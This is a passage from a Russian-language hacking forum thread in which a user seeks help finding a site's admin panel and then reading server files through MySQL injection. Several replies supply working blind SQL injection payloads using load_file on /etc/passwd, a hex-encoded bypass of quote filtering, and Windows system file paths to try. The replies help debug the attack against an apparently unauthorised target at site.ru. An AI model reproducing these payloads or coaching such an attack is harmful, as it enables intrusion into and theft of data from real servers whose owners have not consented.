Помощь в поиске админки

Discussion in 'Песочница' started by 3nvY, 8 Aug 2015.

Page 1 of 2
  1. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Привет всем. Нужна помощь в поиске админки. Искал 2мя тулзами но результата 0.
    Подскажите онлайн ресурс какой или софт, или может приватно кто-нибудь поможет?
     
    #1 3nvY, 8 Aug 2015
  2. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,109
    Likes Received:
    828
    Reputations:
    231
    кидай посмотрю
     
    _________________________
    #2 grimnir, 8 Aug 2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    _________________________
    #3 yarbabin, 8 Aug 2015
    joelblack and 3nvY like this.
  4. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Может быть такое, что получить удалённый доступ к админке невозможно?
     
    #4 3nvY, 10 Aug 2015
  5. i~DOS

    i~DOS Member

    Joined:
    26 Mar 2009
    Messages:
    42
    Likes Received:
    40
    Reputations:
    4
    Да, если, например, доступ разрешен только с определенных ip\диапазонов ip, либо по специальному user-агенту, и.т.д. Точнее получить-то его возможно, но весьма затруднительно.
     
    #5 i~DOS, 10 Aug 2015
  6. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    А где можно почитать про такие случаи поподробнее? Хочу доделать то что начал до конца)
     
    #6 3nvY, 10 Aug 2015
  7. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).
     
    #7 3nvY, 10 Aug 2015
    Last edited: 10 Aug 2015
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
     
    _________________________
    #8 yarbabin, 10 Aug 2015
    3nvY likes this.
  9. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Тоесть если есть возможность загрузки то при:
    site.ru/index.php?id=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
    Выведет то же самое что и при:
    site.ru/index.php?id=1
    Я правильно понимаю?
     
    #9 3nvY, 11 Aug 2015
  10. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Чёт нифига не правильно :confused:
     
    #10 3nvY, 11 Aug 2015
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    is NULL и is not NULL - во втором случае получите TRUE, если есть права
     
    _________________________
    #11 yarbabin, 11 Aug 2015
  12. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Проверяю данные запросы в консоли

    SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.
    SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.

    Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1

    Но если делаю так: site.ru/index.php?id=1 and 1=0--+
    Возвращает пустую страницу.

    Это значит что нет прав на загрузку файла?
    Может я что-то делаю не так?=\
     
    #12 3nvY, 11 Aug 2015
    Last edited: 11 Aug 2015
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    может что-то не так. может кавычки у вас экранируются, может /etc/passwd блокирует WAF, или еще что-то. но результаты при этих запросах должны отличатся вне зависимости от того, есть права или нет.
     
    _________________________
    #13 yarbabin, 11 Aug 2015
  14. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Теперь такой запроc: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ Возвращает пустую страницу.:confused:
    Может сервер на винде...

    yarbabin, Спасибо огромное за помощь буду дальше пытаться ковырять :)
     
    #14 3nvY, 11 Aug 2015
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    и толку что вы спрятали слово в кавычках в хекс и анхекс? :) load_file(0x2f6574632f706173737764)
     
    _________________________
    #15 yarbabin, 11 Aug 2015
  16. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Но теперь хотя бы есть результат)
     
    #16 3nvY, 11 Aug 2015
  17. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1
    а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.

    То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+
    и
    and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+

    просто под рукой сейчас нчего нет что в хекс кодирует строку)
     
    #17 3nvY, 11 Aug 2015
    Last edited: 11 Aug 2015
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    and 1=1 TRUE
    and 1=2 FALSE

    Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.
     
    _________________________
    #18 BigBear, 11 Aug 2015
  19. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    50
    Likes Received:
    21
    Reputations:
    11
    Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).
    Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.
     
    #19 3nvY, 11 Aug 2015
    Last edited: 11 Aug 2015
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,770
    Likes Received:
    881
    Reputations:
    859
    C:\boot.ini

    C:\Windows\System32\drivers\etc\hosts
     
    _________________________
    #20 BigBear, 11 Aug 2015
    3nvY likes this.
(You must log in or sign up to post here.)
Page 1 of 2